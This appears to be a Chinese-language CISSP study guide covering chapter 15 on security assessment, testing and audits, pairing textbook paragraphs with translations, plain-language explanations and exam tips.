Which of the following did the attackers exploit? A. RADIUS B. SAML C. Kerberos D. OIDC B.

中文直译 / 整理

将根密码交给拉里。 C. 将拉里的账户添加到管理员组。 D. 将拉里的账户添加到本地系统账户。 19. 攻击者使用工具利用了NTLM的弱点,识别出管理员的用户账户。 尽管攻 击者未发现管理员的密码,但他们通过冒充管理员访问了远程系统。 以下哪一 项最能标识这种攻击? A. 传递票据 B. 黄金票据 C. 彩虹表 D. 传递哈希 20. 您的组织最近遭受了一次重大数据泄露。 经过调查,安全分析师发现攻 击者正在使用黄金票据访问网络资源。 攻击者利用了以下哪一项? A. RADIUS B. SAML C. Kerberos D. OIDC

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

哈希本身不提供机密性;它主要用于完整性校验。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
第 15 章 · P1029-1085 · 57 个学习单元

安全评估与测试

OSG10 · Chapter 15 · Security Assessment and Testing · 全文覆盖 + 小白精读 + 画报

第 15 章:安全评估与测试

这不是提炼版。本页按 PDF 第 1029-1085 页连续覆盖第 15 章内容,每个学习单元都包含教材原文段落、PDF 中文直译/整理、小白解释、考点提醒和对应画报。

57个连续学习单元
4格原文 / 直译 / 解释 / 考点
57页覆盖第15章正文与章末练习
小白先讲人话,再做题
学习单元 01 / PDF P1029

本章考试范围总览

先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

教材原文段落

THE CISSP TOPICS COVERED IN THIS CHAPTER INCLUDE: Domain 6.0: Security Assessment and Testing 6.1 Design and validate assessment, test, and audit strategies 6.1.1 Internal (e.g., within organization control) 6.1.2 External (e.g., outside organization control) 6.1.3 Third-party (e.g., outside of enterprise control) 6.1.4 Location (e.g., on-premise, cloud, hybrid) 6.2 Conduct security controls testing 6.2.1 Vulnerability assessment 6.2.2 Penetration testing (e.g., red, blue, and/or purple team exercises) 6.2.3 Log reviews 6.2.4 Synthetic transactions/benchmarks 6.2.5 Code review and testing 6.2.6 Misuse case testing 6.2.7 Coverage analysis 6.2.8 Interface testing (e.g., user interface, network interface, application programming interface (API)) 6.2.9 Breach attack simulations 6.2.10 Compliance checks 6.3 Collect security process data (e.g., technical and administrative) 6.3.1 Account management 6.3.2 Management review and approval 6.3.3 Key performance and risk indicators 6.3.4 Backup verification data 6.3.5 Training and awareness 6.3.6 Disaster recovery (DR) and Business Continuity (BC)

中文直译 / 整理

本章涵盖的CISSP主题包括: 领域6.0:安全评估与测试 6.1 设计和验证评估、测试和审计策略 6.1.1 内部(例如,组织内部控制) 6.1.2 外部(例如,组织外部控制) 6.1.3 第三方(例如,企业外部控制) 6.1.4 位置(例如,本地、云、混合) 6.2 进行安全控制测试 6.2.1 漏洞评估 6.2.2 渗透测试(例如,红队、蓝队和/或紫队演练) 6.2.3 日志审查 6.2.4 合成事务/基准测试 6.2.5 代码审查与测试 6.2.6 滥用案例测试 6.2.7 覆盖率分析 6.2.8 接口测试(例如用户界面、网络接口、应用程序编程接口(API)) 6.2.9 违规攻击模拟 6.2.10 合规性检查 6.3 收集安全流程数据(例如技术性和管理性) 6.3.1 账户管理 6.3.2 管理评审与批准 6.3.3 关键绩效和风险指标 6.3.4 备份验证数据 6.3.5 培训与意识 6.3.6 灾难恢复(DR)和业务连续性(BC)

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

漏洞评估:漏洞评估偏技术扫描,主要找已知弱点。

渗透测试:渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。

审计:审计记录主体行为,用于追责、复盘和取证。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“本章考试范围总览”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

自动化扫描、已知弱点、补洞通常对应 vulnerability assessment。

渗透测试通常比漏洞扫描更深入,但也更需要授权和范围控制。

没有日志和身份绑定,就很难问责。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
漏洞评估 漏洞评估偏技术扫描,主要找已知弱点。
渗透测试 渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。
审计 审计记录主体行为,用于追责、复盘和取证。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
渗透测试 渗透测试在授权范围内模拟攻击验证风险。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 02 / PDF P1030

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

6.4 Analyze test output and generate report 6.4.1 Remediation 6.4.2 Exception handling 6.4.3 Ethical disclosure 6.5 Conduct or facilitate security audits 6.5.1 Internal (e.g., within organization control) 6.5.2 External (e.g., outside organization control) 6.5.3 Third-party (e.g., outside enterprise control) 6.5.4 Location (e.g., on-premise, cloud, hybrid) Domain 8.0: Software Development Security 8.2 Identify and apply security controls in software development ecosystems 8.2.9 Application security testing (e.g., static application security testing (SAST), dynamic application security testing (DAST), software composition analysis, Interactive Application Security Test (IAST)) Throughout this book, you've learned about many of the different controls that information security professionals implement to safeguard the confidentiality, integrity, and availability of data.

Among these, technical controls play an important role in protecting servers, networks, and other information processing resources. Once security professionals build and configure these controls, they must regularly test them to ensure that they continue to properly safeguard information. Security assessment and testing programs perform regular checks to ensure that adequate security controls are in place and that they effectively perform their assigned functions. In this chapter, you'll learn about many of the assessment and testing controls used by security professionals around the world. Building a Security Assessment and Testing Program 6.4

中文直译 / 整理

分析测试输出并生成报告 6.4.1 修复 6.4.2 异常处理 6.4.3 道德披露 6.5 执行或协助安全审计 6.5.1 内部(例如,在组织控制范围内) 6.5.2 外部(例如,组织外部控制) 6.5.3 第三方(例如,企业外部控制) 6.5.4 位置(例如,本地、云、混合) 第8.0域:软件开发安全 8.2 在软件开发生态系统中识别并应用安全控制 8.2.9 应用程序安全测试(例如,静态应用程序安全测试 (SAST)、动态应用程序安全测试(DAST)、软件组成分 析、交互式应用程序安全测试(IAST)) 在本书中,您已经了解了信息安全专业人员为保护数据的机密性、完整性和 可用性而实施的多种不同控制措施。 其中,技术控制在保护服务器、网络和 其他信息处理资源方面发挥着重要作用。 安全专业人员在构建和配置这些控 制措施后,必须定期对其进行测试,以确保它们持续有效地保护信息。 安全评估与测试程序定期进行检查,以确保已部署充分的安全控制措施,并且 这些措施能够有效执行其指定功能。 在本章中,您将了解全球安全专业人员使 用的多种评估与测试控制措施。 构建安全评估与测试计划

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

审计:审计记录主体行为,用于追责、复盘和取证。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

没有日志和身份绑定,就很难问责。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
审计 审计记录主体行为,用于追责、复盘和取证。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 03 / PDF P1031

可用性:需要时能用,且性能可接受

可用性关注中断、故障、DoS、备份和冗余。

教材原文段落

The cornerstone maintenance activity for an information security team is their security assessment and testing program. This program includes tests, assessments, and audits that regularly verify that an organization has adequate security controls and that those security controls are functioning properly and effectively safeguarding information assets. In this section, you will learn about the three major components of a security assessment program: Security tests Security assessments Security audits Whenever you design a security testing, assessment, and audit program, you should ensure that it will be effective in all locations where you operate.

This includes on-premise, cloud, and hybrid locations. Security Testing Security tests verify that a control is functioning properly. These tests include automated scans, tool-assisted penetration tests, and manual attempts to undermine security. Security testing should take place on a regular schedule, with attention paid to each of the key security controls protecting an organization.

When scheduling security controls for review, information security managers should consider the following factors: Availability of security testing resources Criticality of the systems and applications protected by the tested controls Sensitivity of information contained on tested systems and applications Likelihood of a technical failure of the mechanism implementing the control Likelihood of a misconfiguration of the control that would jeopardize security Risk that the system will come under attack Rate of change of the control configuration

中文直译 / 整理

信息安全团队的核心维护活动是其安全评估与测试程序。 该程序包括测试、 评估和审计,定期验证组织是否具备充分的安全控制措施,以及这些安全控 制措施是否正常运行并有效保护信息资产。 在本节中,您将了解安全评估计划的三个主要组成部分: 安全测试 安全评估 安全审计 无论您何时设计安全测试、评估和审计计划,都应确保其在您运营的所有地点 都有效。 这包括本地、云和混合环境。 安全测试 安全测试用于验证控制措施是否正常运行。 这些测试包括自动化扫描、工具辅 助的渗透测试以及手动尝试破坏安全性。 安全测试应定期进行,并重点关注保 护组织的每一项关键安全控制措施。 在安排安全控制措施的审查时,信息安全 管理人员应考虑以下因素: 安全测试资源的可用性 被测控制措施所保护的系统和应用程序的关键性 被测系统和应用程序中包含信息的敏感性 实现控制措施的机制发生技术故障的可能性 控制措施发生配置错误从而危及安全的可能性 系统遭受攻击的风险 控制配置的变化率

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:可用性关注中断、故障、DoS、备份和冗余。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

渗透测试:渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

审计:审计记录主体行为,用于追责、复盘和取证。

程序:程序是一步一步怎么做。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“可用性:需要时能用,且性能可接受”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

渗透测试通常比漏洞扫描更深入,但也更需要授权和范围控制。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

没有日志和身份绑定,就很难问责。

Step-by-step、SOP 常对应 procedure。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
渗透测试 渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
审计 审计记录主体行为,用于追责、复盘和取证。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
渗透测试 渗透测试在授权范围内模拟攻击验证风险。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 04 / PDF P1032

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Other changes in the technical environment that may affect the control performance Difficulty and time required to perform a control test Impact of the test on normal business operations After assessing each of these factors, security teams design and validate a comprehensive assessment and testing strategy. This strategy may include frequent automated tests supplemented by infrequent manual tests. For example, a credit card processing system may undergo automated vulnerability scanning on a nightly basis with immediate alerts to administrators when the scan detects a new vulnerability.

The automated scan requires no work from administrators once it is configured, so it is easy to run quite frequently. The security team may wish to complement those automated scans with a manual penetration test performed by an external consultant for a significant fee. Those tests may occur on an annual basis to minimize costs and disruption to the business. Many security testing programs begin on a haphazard basis, with security professionals simply pointing their fancy new tools at whatever systems they come across first.

Experimentation with new tools is fine, but security testing programs should be carefully designed and include rigorous, routine testing of systems using a risk-prioritized approach. Of course, it's not sufficient to simply perform security tests. Security professionals must also carefully review the results of those tests to ensure that each test was successful. In some cases, these reviews consist of manually reading the test output and verifying that the test completed successfully. Some tests require human interpretation and must be performed by trained analysts.

Other reviews may be automated, performed by security testing tools that verify the successful completion of a test, log the results, and remain silent unless there is a significant finding. When the system detects an issue requiring administrator attention, it may trigger an alert, send an email or text message, or automatically open a trouble ticket, depending on the severity of the alert and the administrator's preference.

中文直译 / 整理

可能影响控制性能的技术环境其他变更 执行控制测试的难度和所需时间 测试对正常业务运营的影响 在评估了这些因素之后,安全团队设计并验证了一项全面的评估和测试策略。 该策略可能包括频繁的自动化测试,辅以较少频率的手动测试。 例如,信用卡 处理系统可能每晚进行自动化漏洞扫描,并在扫描检测到新漏洞时立即向管理 员发出警报。 一旦配置完成,自动化扫描无需管理员投入任何工作,因此可以 非常频繁地运行。 安全团队可能希望通过外部顾问执行一次昂贵的手动渗透测 试来补充这些自动化扫描。 这些测试可能每年进行一次,以最小化成本和对业 务的干扰。 许多安全测试计划最初是随意启动的,安全专业人员只是将他们新购 置的先进工具随意指向首先遇到的系统。 对新工具进行实验是可以的,但 安全测试计划应经过精心设计,并采用风险优先的方法,对系统进行严格 且常规的测试。 当然,仅仅执行安全测试是不够的。 安全专业人员还必须仔细审查这些测试 的结果,以确保每个测试都成功完成。 在某些情况下,这些审查包括手动阅 读测试输出并验证测试是否成功完成。 某些测试需要人工解读,必须由经过 培训的分析师执行。

其他评审可能是自动化的,由安全测试工具执行,这些工具验证测试是否成 功完成、记录结果,并在没有重大发现时保持静默。 当系统检测到需要管理 员关注的问题时,它可能会根据警报的严重程度和管理员的偏好触发警报、 发送电子邮件或短信,或自动创建故障工单。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

漏洞扫描:漏洞扫描用工具找已知弱点。

渗透测试:渗透测试在授权范围内模拟攻击验证风险。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

扫描发现弱点,不等于已经成功利用。

渗透测试需要书面授权、范围和规则。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
漏洞扫描 漏洞扫描用工具找已知弱点。
渗透测试 渗透测试在授权范围内模拟攻击验证风险。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 05 / PDF P1033

第三方治理:外包不外包责任

供应商也要被合同、审计、评估和持续监控管理起来。

教材原文段落

Security Assessments Security assessments are comprehensive reviews of the security of a system, application, or other tested environment. During a security assessment, a trained information security professional performs a risk assessment that identifies vulnerabilities in the tested environment that may allow a compromise and makes recommendations for remediation, as needed. Security assessments normally include the use of security testing tools but go beyond automated scanning and manual penetration tests. They also include a thoughtful review of the threat environment, current and future risks, and the value of the targeted environment.

The main work product of a security assessment is normally an assessment report addressed to management that contains the results of the assessment in nontechnical language and concludes with specific recommendations for improving the security of the tested environment. Assessments may be conducted by an internal team, or they may be outsourced to a third-party assessment team with specific expertise in the areas being assessed.

中文直译 / 整理

安全评估 安全评估是对系统、应用程序或其他被测环境的安全性进行全面评审。 在安全 评估期间,经过培训的信息安全专业人员会执行风险评估,识别被测环境中可 能导致被攻破的漏洞,并根据需要提出修复建议。 安全评估通常包括使用安全测试工具,但其范围超越了自动化扫描和手动渗透 测试。 它们还包括对威胁环境、当前和未来风险以及目标环境价值的深入分析。 安全评估的主要成果通常是提交给管理层的评估报告,该报告以非技术性语言 呈现评估结果,并提出针对改进被测环境安全性的具体建议。 评估可由内部团队进行,也可以外包给在被评估领域具有专门知识的第三 方评估团队。

小白解释

场景先行:你是公司的安全负责人,正在读第 1033 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:供应商也要被合同、审计、评估和持续监控管理起来。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

程序:程序是一步一步怎么做。

渗透测试:渗透测试在授权范围内模拟攻击验证风险。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第三方治理:外包不外包责任”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

Step-by-step、SOP 常对应 procedure。

渗透测试需要书面授权、范围和规则。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
程序 程序是一步一步怎么做。
渗透测试 渗透测试在授权范围内模拟攻击验证风险。
学习单元 06 / PDF P1034

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

NIST SP 800-53A The National Institute for Standards and Technology (NIST) offers a special publication that describes best practices in conducting security and privacy assessments. NIST Special Publication 800-53A—Assessing Security and Privacy Controls in Information Systems and Organizations is available for download: http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800- 53Ar5.pdf Under NIST 800-53A, assessment objects include four components: Specifications are the documents associated with the system being audited. Specifications generally include policies, procedures, requirements, specifications, and designs.

Mechanisms are the controls used within an information system to meet the specifications. Mechanisms may be based in hardware, software, or firmware. Activities are the actions carried out by people within an information system. These may include performing backups, exporting log files, or reviewing account histories. Individuals are the people who implement specifications, mechanisms, and activities. When conducting an assessment, assessors may examine any of the four components listed here. They may also interview individuals and perform direct tests to determine the effectiveness of controls.

Security Audits Security audits use many of the same techniques followed during security assessments but must be performed by independent auditors. An organization's security staff may routinely perform security tests and assessments, but this is not the case for audits. Assessment and testing results are meant for internal use only and are designed to evaluate controls with an eye toward finding potential improvements. Audits, on the other hand, are evaluations performed with the purpose of demonstrating the NIST SP 800‑53A

中文直译 / 整理

美国国家标准与技术研究院(NIST)提供了一份特殊出版物,描述了开 展安全和隐私评估的最佳实践。 NIST特别出版物800-53A——评估信息 系统和组织中的安全与隐私控制 可供下载: http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800- 53Ar5.pdf 根据NIST 800‑53A,评估对象包括四个组成部分: 规范是与被审计系统相关的文档。 规范通常包括政策、程序、要求、 规范和设计。 机制是信息系统中用于满足规范的控制措施。 机制可能基于硬件、软 件 , 或固件。 活动是信息系统中人员执行的操作。 这些操作可能包括执行备份、导 出日志文件或审查账户历史记录。 个人是实施规范、机制的人员 , 和活动的人员。 在进行评估时,评估人员可以检查此处列出的四个组成部分中的任何一个。 他们还可以访谈个人并进行直接测试,以确定控制措施的有效性。 安全审计 安全审计使用了与安全评估中相同的许多技术,但必须由独立的审计员执行。 组织的安全人员可能会定期执行安全测试和评估,但审计并非如此。

评估和测 试结果仅供内部使用,旨在评估控制措施,以发现潜在的改进空间。 而审计则 是为了向第三方证明控制措施的

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

标准:标准给出必须满足的最低要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 07 / PDF P1035

第三方治理:外包不外包责任

供应商也要被合同、审计、评估和持续监控管理起来。

教材原文段落

effectiveness of controls to a third party. The staff who design, implement, and monitor controls for an organization have an inherent conflict of interest when evaluating the effectiveness of those controls. Auditors provide an impartial, unbiased view of the state of security controls. They write reports that are quite similar to security assessment reports, but those reports are intended for different audiences that may include an organization's board of directors, government regulators, and other third parties. There are three main types of audits: internal audits, external audits, and third-party audits.

中文直译 / 整理

有效性。 为组织设计、实施和监控控制措施的人员在评估这些控制措施的有效 性时,存在固有的利益冲突。 审计师提供对安全控制状态的公正、无偏见的评估。 他们撰写的报告与安全评 估报告非常相似,但这些报告面向不同的受众,可能包括组织的董事会、政府 监管机构和其他第三方。 审计主要有三种类型:内部审计、外部审计和第三方 审计。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:供应商也要被合同、审计、评估和持续监控管理起来。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

审计:审计检查控制是否存在、是否有效、是否符合要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第三方治理:外包不外包责任”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

审计题关注独立性、证据、范围和报告。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 08 / PDF P1036

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

Government Auditors Discover Air Traffic Control Security Vulnerabilities Federal, state, and local governments also use internal and external auditors to perform security assessments. The U.S. Government Accountability Office (GAO) performs federal government audits at the request of Congress, and these GAO audits often focus on information security risks.

In 2015, the GAO released an audit report titled “Information Security: FAA Needs to Address Weaknesses in Air Traffic Control Systems.” The conclusion of this report was damning: “While the Federal Aviation Administration (FAA) has taken steps to protect its air traffic control systems from cyber-based and other threats, significant security control weaknesses remain, threatening the agency's ability to ensure the safe and uninterrupted operation of the national airspace system (NAS).

These include weaknesses in controls intended to prevent, limit and detect unauthorized access to computer resources, such as controls for protecting system boundaries, identifying and authenticating users, authorizing users to access systems, encrypting sensitive data, and auditing and monitoring activity on FAA's systems.” The report went on to make 17 recommendations on how the FAA might improve its information security controls to better protect the integrity and availability of the nation's air traffic control system. The full GAO report may be found at www.gao.gov/assets/gao-15-221.pdf.

Internal Audits Internal audits are performed by an organization's internal audit staff and are typically intended for internal audiences. The internal audit staff performing these audits normally have a reporting line that is completely independent of the functions they evaluate. In many organizations, the chief audit executive reports directly to the president, chief executive officer (CEO), or similar role. The chief audit executive (CAE) may also have reporting responsibility directly to the organization's governing board.

中文直译 / 整理

政府审计人员发现空中交通管制安全漏洞 联邦、州和地方政府也使用内部和外部审计师进行安全评估。 美国政府 问责局(GAO)应国会要求开展联邦政府审计,这些GAO审计通常关注 信息安全风险。 2015年,GAO发布了一份题为《信息安全:联邦航空管 理局需解决空中交通控制系统中的弱点》的审计报告。 本报告的结论令人震惊:"尽管联邦航空管理局(FAA)已采取措施保护其 空中交通控制系统免受网络及其他威胁,但仍存在严重的安全控制缺陷,威 胁到该机构确保国家空域系统(NAS)安全和不间断运行的能力。 这些缺 陷包括旨在防止、限制和检测对计算机资源未授权访问的控制措施中的弱点, 例如保护系统边界、识别和验证用户身份、授权用户访问系统、加密敏感数 据以及审计和监控FAA系统活动的控制措施。 " 报告进一步提出了17项建议,以帮助FAA改进其信息安全控制措施,更好 地保护国家空中交通管制系统的完整性和可用性。 完整的GAO报告可在 www.gao.gov/assets/gao-15-221.pdf获取。 内部审计 内部审计由组织的内部审计人员执行,通常面向内部受众。 执行这些审计的内 部审计人员通常具有完全独立于其所评估职能的汇报线。

